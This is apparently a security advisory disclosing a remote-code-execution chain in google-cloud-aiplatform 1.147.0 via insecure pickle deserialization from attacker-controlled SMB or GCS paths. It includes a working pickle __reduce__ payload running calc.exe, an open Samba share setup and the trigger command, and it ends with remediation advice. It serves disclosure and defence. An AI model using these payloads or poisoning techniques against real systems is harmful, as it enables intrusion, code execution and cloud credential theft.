google-cloud-aiplatform - Version 1.147.0 / Remote Code Execution (RCE) via Insecure Deserialization (Bug Chaining)
The following documents the chaining of two distinct vulnerabilities: (1) Insecure Configuration Injection via AIP_STORAGE_URI or staging_bucket and (2) Insecure Deserialization via pickle/cloudpickle, whose technical impact results in Remote Code Execution (RCE) without requiring "self-injection" by the victim.
However, below are one (1) way to reproduce RCE in google-cloud-aiplatform using an SMB share controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 1.147.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
google-cloud-aiplatform (also known as python-aiplatform in its source repository) is the official Google Cloud Python SDK for Vertex AI. Vertex AI is Google Cloud's unified, enterprise-grade machine learning platform designed to help data scientists and ML engineers build, deploy, and scale machine learning models and AI applications.
The SDK is a critical component in modern MLOps pipelines, used to automate workflows, train custom models, manage datasets, and run agentic frameworks or reasoning engines. Because it handles the transfer and initialization of high-value AI models and pipeline configurations between local workstations, CI/CD environments, and Google Cloud, its integrity is fundamental to the security of the entire AI/ML supply chain.
Vulnerability Description
The SDK implements several sinks where serialized Python objects (models, agents, or reasoning engines) are loaded from remote locations. By providing a malicious URI (GCS or SMB/UNC), an attacker can force the SDK to download and deserialize an arbitrary payload.
The vulnerable code in google/cloud/aiplatform/prediction/sklearn/predictor.py:
62: prediction_utils.download_model_artifacts(artifacts_uri)
...
86: self._model = pickle.load(open(prediction.MODEL_FILENAME_PKL, "rb"))
In this flow, download_model_artifacts copies files from the attacker-controlled artifacts_uri (which supports SMB/UNC on Windows) to the local environment, and pickle.load immediately executes the payload.
Technical Impact Analysis
Project Purpose & Context
google-cloud-aiplatform is the official Python SDK for Vertex AI, Google's unified machine learning platform. It is used by data scientists and ML engineers to orchestrate the entire ML lifecycle, from data preparation and training to model deployment and monitoring. The library handles high-value artifacts, including model weights and complex agentic logic, often involving the serialization of custom Python classes.
Platform & Deployment Environment
- MLOps Pipelines: CI/CD systems that automate model training and deployment.
- Data Science Workstations: Local environments (Windows/Linux) used for model development and testing.
- Vertex AI Managed Services: Backend environments where the SDK manages model serving and agent orchestration.
Comprehensive Risk Assessment
The vulnerability is rated as Critical. The ability to trigger RCE through network URIs completely bypasses the traditional "local-only" trust boundary of Pickle. In enterprise environments, this can lead to:
- GCP Credential Theft: Exfiltration of IAM tokens from a developer's workstation or a CI/CD runner.
- Supply Chain Attacks: Poisoning shared "Staging Buckets" to compromise all developers in a project.
- Lateral Movement: Pivoting from a compromised researcher's machine to the broader corporate VPC or Cloud project.
Attack Scenario
Who wants to exploit a particular vulnerability?
Adversaries targeting AI/ML research data, industrial competitors seeking to steal proprietary model architectures, or malicious actors aiming to hijack high-performance compute resources (TPUs/GPUs) or obtain sensitive Cloud service account keys.
For what gain?
Intellectual property theft (model architectures, datasets), financial gain via resource hijacking, or long-term persistence in a victim's Cloud infrastructure through credential exfiltration.
In what way?
Attackers can leverage several remote vectors:
- Staging Redirection: Social-engineering a developer into using an attacker-controlled
staging_bucketfor an "experiment". - Artifact Poisoning: Overwriting remote
.pklfiles in a shared GCS bucket to trigger the TOCTOU race condition during a deployment validation. - Collaborative Resource Sharing: Contributing a "malicious agent" to a public or internal hub that triggers RCE when a victim attempts a local evaluation or preview.
Reproduction Steps
On the Raspberry (attacker)
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $
Shared Resource Configuration (SMB):
- Install Samba:
sudo apt update && sudo apt install samba samba-common-bin -y - Prepare the attack directory:
mkdir ~/lab_attack
chmod 755 /home/kw0 # Allows Samba to access the HOME
chmod -R 777 ~/lab_attack
3. Configure Samba: Add to the end of /etc/samba/smb.conf:
[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
4. Payload Generation on the Raspberry:
Run the specialized exploit.py script to generate the model.pkl file directly in the shared path:
import pickle
import os
class RCE:
def __reduce__(self):
# We use 'eval' and '__import__' to ensure universal execution
# This avoids module import errors (such as POSIX)
# by not depending on the state of the local 'os' module during pickling.
return (eval, ("__import__('os').system('calc.exe')",))
# Specify the path on the Raspberry Pi
with open('/home/kw0/lab_attack/model.pkl', 'wb') as f:
import pickle
pickle.dump(RCE(), f)
On Windows (victim)
PS L:\Pickle-RCE-Finder\PYPI-google-cloud-aiplatform> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
PS L:\Pickle-RCE-Finder\PYPI-google-cloud-aiplatform>
Technical Requirements
- Create a Python environment:
python -m venv .venv - Activate the environment:
.venv\Scripts\activate
pip install "google-cloud-aiplatform[prediction]" scikit-learn joblib
Exploit Execution:
- Setting the path SMB as variable environment:
$env:AIP_STORAGE_URI = "\\192.168.1.90\lab_share"
2. Launch deserialization:
python -c "import os; from google.cloud.aiplatform.prediction.sklearn.predictor import SklearnPredictor; predictor = SklearnPredictor(); path = os.environ.get('AIP_STORAGE_URI'); predictor.load(path)"
Other RCE vectors in google-cloud-aiplatform remotely controlled by an attacker
Vector #1: GCS Round-Trip TOCTOU (Race Condition)
The SDK implements a pattern where objects are serialized to GCS and immediately read back for validation. This creates a Time-of-Check Time-of-Use (TOCTOU) vulnerability that can be exploited via the network.
vertexai/agent_engines/_agent_engines.py_upload_agent_engine()cloudpickle.load(f) (Line 1224)Attack Logic & Context Reversal
The SDK serializes the AgentEngine to a .pkl file in a GCS bucket (Line 1216) and then immediately opens a read stream to "validate" the upload (Line 1224). Since GCS is a networked filesystem with inherent latency, an attacker with write access to the same staging bucket can race the SDK.
Exploit Scenario
- Initial Setup: Attacker deploys a monitoring script (or GCS-triggered Cloud Function) targeting the victim's
staging_bucket. - Interaction: The Victim (e.g., a Lead Data Scientist) runs
AgentEngine.create(my_agent)to deploy a new agent. - Execution:
- SDK uploads
reasoning_engine.pkl. - Attacker's script detects the new object and immediately overwrites it with a malicious payload.
- SDK initiates the validation
load(), pulling and executing the attacker's payload locally.
- SDK uploads
- Final Result: Full machine compromise of the Victim's environment with their GCP credentials.
- Lateral Movement: Attackers can pivot from a low-privileged researcher account (with bucket access) to an Admin/Owner account (performing the deployment).
- Supply Chain: Malicious templates can trigger this during the "getting started" phase.
Vector #2: Staging Bucket Spec Injection
The SDK allows the redirection of all serialization artifacts to an arbitrary GCS URI, which is then used as a trusted source for local deserialization checks.
google/cloud/aiplatform/initializer.pyvertexai.init()cloudpickle.load (multiple locations via _prepare)staging_bucket parameter.Analysis & Impact
If a user is social-engineered into using an attacker-controlled staging bucket URI (e.g., gs://public-attacker-bucket/malicious-staging), any subsequent call to AgentEngine.create() or AgentEngine.update() will download and execute the attacker's payload during the SDK's internal verification phase.
Vector #3: Local Agent Run / Evaluation RCE
The SDK supports a "Local Agent Run" mode for evaluations, which materializes agent state from serialized artifacts.
_genai/_evals_common.py_execute_local_agent_run_with_retry()cloudpickle.loadagent parameter in evaluation tasks.Exploit Scenario
- Setup: Attacker contributes a "Reasoning Engine" or "Agent" to a shared hub or project.
- Trigger: Victim runs an evaluation job (e.g.,
eval_task.run(agent=malicious_agent_uri)). - Impact: The evaluation runner attempts a "Local Agent Run" to benchmark performance. This triggers the download and
load()of the agent's state, leading to RCE on the benchmarking machine.
Executive Summary: Insecure Deserialization via Bug Chaining in google-cloud-aiplatform
The research documents a critical RCE vulnerability chain in google-cloud-aiplatform (version 1.147.0) by leveraging insecure configuration injection and insecure deserialization.
- Root Cause: The SDK utilizes
pickle/cloudpickleto load model artifacts and agents from remote locations (GCS or SMB/UNC paths) without proper validation. - Exploitation Mechanism: By manipulating configuration parameters like
AIP_STORAGE_URIorstaging_bucket, an attacker can force the SDK to fetch and execute a malicious payload from an attacker-controlled remote server. This bypasses traditional "local-only" trust boundaries, as the tool treats these remote resources as trusted.
Analysis of Scope and Security Implications
This vulnerability is of critical severity because it transforms a standard SDK operation into an RCE vector that does not require the victim to manually inject malicious code.
1. Infection Scenarios
- Supply Chain & Staging Poisoning: Attackers can overwrite remote
.pklfiles in shared GCS buckets to exploit TOCTOU (Time-of-Check Time-of-Use) race conditions during deployment validations. - Social Engineering: Developers can be coerced into using an attacker-controlled
staging_bucketURI for "experiments," resulting in immediate code execution upon calling initialization functions likevertexai.init(). - Collaborative Hub Poisoning: By contributing a "malicious agent" to a shared hub, an attacker can compromise any user who attempts to locally evaluate or preview that agent, as the SDK triggers
cloudpickle.loadduring evaluation.
2. Factors Exacerbating Risk
- Cloud Credential Theft: Successful exploitation allows for the exfiltration of IAM tokens and sensitive Cloud service account keys from the victim's workstation or CI/CD pipeline.
- Lateral Movement: The vulnerability facilitates pivoting from a compromised research workstation to broader corporate VPCs or internal Cloud projects.
- Resource Hijacking: Attackers can gain control over high-performance compute resources (TPUs/GPUs) managed by the victim's Cloud infrastructure.
Conclusion and Recommendation
This is a critical-severity vulnerability. The chaining of configuration injection with insecure deserialization sinks renders the SDK a potent vector for environment compromise.
Suggested actions for the development team:
- Restrict Deserialization: Replace
pickle/cloudpicklewith secure, non-executable serialization formats (e.g., JSON or Protobuf) for loading model configurations and agents. - Path Validation: Implement strict allow-listing for
artifacts_uriandstaging_bucketpaths to prevent the resolution of UNC/SMB shares or untrusted GCS buckets. - Remove Implicit Trust: Treat all data fetched from networked storage (GCS/SMB) as untrusted and verify signatures before any deserialization process.